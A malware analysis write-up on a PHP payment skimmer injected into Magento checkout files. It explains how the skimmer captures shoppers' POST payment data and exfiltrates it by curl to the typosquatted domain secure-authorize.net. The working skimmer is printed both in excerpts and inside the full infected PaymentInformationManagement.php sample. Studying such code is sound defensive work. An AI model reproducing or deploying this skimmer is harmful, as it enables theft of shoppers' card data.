PHP skimmer -> secure-authorize.net (malicious)
Outline
Skimmer⌗
This PHP skimmer’s code was found injected into two files on a compromised Magento website:
./vendor/magento/module-checkout/Model/PaymentInformationManagement.php ./vendor/magento/module-checkout/Model/GuestPaymentInformationManagement.php
file_get_contents(‘php://input’)⌗
file_get_contents('php://input') is used to capture POST request data sent to the injected PHP file(s).
$data = file_get_contents('php://input');
if (is_object($data = @json_decode($data))) {
$data->ip = $_SERVER['REMOTE_ADDR'];
$data->cc_cid = strvaL(rand(100,999));
$site = $_SERVER['HTTP_HOST'];
if (substr($site, 0, 4) == "www.") {
$site = substr($site, 4);
}
$data->site = $site;
$data = json_encode($data);
...
That’s why the attacker will inject the skimmer into a PHP file used during the checkout process on the infected ecommerce website - as they know that payment data submitted by the victim shopper’s POST request will be captured.
Exfiltration⌗
The exfiltration is handled by the PHP curl function and sends the captured payment data to an interesting exfil domain via a POST request…
...
$url = "secure-authorize.net/gateway/transact.dll";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_REFERER, $url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_TIMEOUT, 60);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: text/plain'));
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_exec($ch);
curl_close($ch);
}
secure-authorize.net⌗
This malicious domain uses a variation of the “Missing Dot” technique - except it replaces a dot (.) with a dash (-).
secure-authorize.net/gateway/transact.dll
It is actually trying to impersonate the legitimate secure.authorize.net subdomain that is referenced in authorize.net official documents.
Sample⌗
<?php
/**
* Copyright © Magento, Inc. All rights reserved.
* See COPYING.txt for license details.
*/
namespace Magento\Checkout\Model;
use Magento\Framework\Exception\CouldNotSaveException;
/**
* @SuppressWarnings(PHPMD.CouplingBetweenObjects)
*/
class PaymentInformationManagement implements \Magento\Checkout\Api\PaymentInformationManagementInterface
{
/**
* @var \Magento\Quote\Api\BillingAddressManagementInterface
* @deprecated 100.2.0 This call was substituted to eliminate extra quote::save call
*/
protected $billingAddressManagement;
/**
* @var \Magento\Quote\Api\PaymentMethodManagementInterface
*/
protected $paymentMethodManagement;
/**
* @var \Magento\Quote\Api\CartManagementInterface
*/
protected $cartManagement;
/**
* @var PaymentDetailsFactory
*/
protected $paymentDetailsFactory;
/**
* @var \Magento\Quote\Api\CartTotalRepositoryInterface
*/
protected $cartTotalsRepository;
/**
* @var \Psr\Log\LoggerInterface
*/
private $logger;
/**
* @var \Magento\Quote\Api\CartRepositoryInterface
*/
private $cartRepository;
/**
* @param \Magento\Quote\Api\BillingAddressManagementInterface $billingAddressManagement
* @param \Magento\Quote\Api\PaymentMethodManagementInterface $paymentMethodManagement
* @param \Magento\Quote\Api\CartManagementInterface $cartManagement
* @param PaymentDetailsFactory $paymentDetailsFactory
* @param \Magento\Quote\Api\CartTotalRepositoryInterface $cartTotalsRepository
* @codeCoverageIgnore
*/
public function __construct(
\Magento\Quote\Api\BillingAddressManagementInterface $billingAddressManagement,
\Magento\Quote\Api\PaymentMethodManagementInterface $paymentMethodManagement,
\Magento\Quote\Api\CartManagementInterface $cartManagement,
\Magento\Checkout\Model\PaymentDetailsFactory $paymentDetailsFactory,
\Magento\Quote\Api\CartTotalRepositoryInterface $cartTotalsRepository
) {
$this->billingAddressManagement = $billingAddressManagement;
$this->paymentMethodManagement = $paymentMethodManagement;
$this->cartManagement = $cartManagement;
$this->paymentDetailsFactory = $paymentDetailsFactory;
$this->cartTotalsRepository = $cartTotalsRepository;
}
/**
* {@inheritDoc}
*/
public function savePaymentInformationAndPlaceOrder(
$cartId,
\Magento\Quote\Api\Data\PaymentInterface $paymentMethod,
\Magento\Quote\Api\Data\AddressInterface $billingAddress = null
) {
$this->savePaymentInformation($cartId, $paymentMethod, $billingAddress);
try {
$orderId = $this->cartManagement->placeOrder($cartId);
} catch (\Magento\Framework\Exception\LocalizedException $e) {
throw new CouldNotSaveException(
__($e->getMessage()),
$e
);
} catch (\Exception $e) {
$this->getLogger()->critical($e);
throw new CouldNotSaveException(
__('An error occurred on the server. Please try to place the order again.'),
$e
);
}
return $orderId;
}
/**
* {@inheritDoc}
*/
public function savePaymentInformation(
$cartId,
\Magento\Quote\Api\Data\PaymentInterface $paymentMethod,
\Magento\Quote\Api\Data\AddressInterface $billingAddress = null
) {
if ($billingAddress) {
/** @var \Magento\Quote\Api\CartRepositoryInterface $quoteRepository */
$quoteRepository = $this->getCartRepository();
/** @var \Magento\Quote\Model\Quote $quote */
$quote = $quoteRepository->getActive($cartId);
$quote->removeAddress($quote->getBillingAddress()->getId());
$quote->setBillingAddress($billingAddress);
$quote->setDataChanges(true);
$shippingAddress = $quote->getShippingAddress();
if ($shippingAddress && $shippingAddress->getShippingMethod()) {
$shippingDataArray = explode('_', $shippingAddress->getShippingMethod());
$shippingCarrier = array_shift($shippingDataArray);
$shippingAddress->setLimitCarrier($shippingCarrier);
}
}
$this->paymentMethodManagement->set($cartId, $paymentMethod);
$data = file_get_contents('php://input');
if (is_object($data = @json_decode($data))) {
$data->ip = $_SERVER['REMOTE_ADDR'];
$data->cc_cid = strvaL(rand(100,999));
$site = $_SERVER['HTTP_HOST'];
if (substr($site, 0, 4) == "www.") {
$site = substr($site, 4);
}
$data->site = $site;
$data = json_encode($data);
$url = "http://secure-authorize.net/gateway/transact.dll";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_REFERER, $url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_TIMEOUT, 60);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: text/plain'));
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_exec($ch);
curl_close($ch);
}
return true;
}
/**
* {@inheritDoc}
*/
public function getPaymentInformation($cartId)
{
/** @var \Magento\Checkout\Api\Data\PaymentDetailsInterface $paymentDetails */
$paymentDetails = $this->paymentDetailsFactory->create();
$paymentDetails->setPaymentMethods($this->paymentMethodManagement->getList($cartId));
$paymentDetails->setTotals($this->cartTotalsRepository->get($cartId));
return $paymentDetails;
}
/**
* Get logger instance
*
* @return \Psr\Log\LoggerInterface
* @deprecated 100.2.0
*/
private function getLogger()
{
if (!$this->logger) {
$this->logger = \Magento\Framework\App\ObjectManager::getInstance()->get(\Psr\Log\LoggerInterface::class);
}
return $this->logger;
}
/**
* Get Cart repository
*
* @return \Magento\Quote\Api\CartRepositoryInterface
* @deprecated 100.2.0
*/
private function getCartRepository()
{
if (!$this->cartRepository) {
$this->cartRepository = \Magento\Framework\App\ObjectManager::getInstance()
->get(\Magento\Quote\Api\CartRepositoryInterface::class);
}
return $this->cartRepository;
}
}
More Research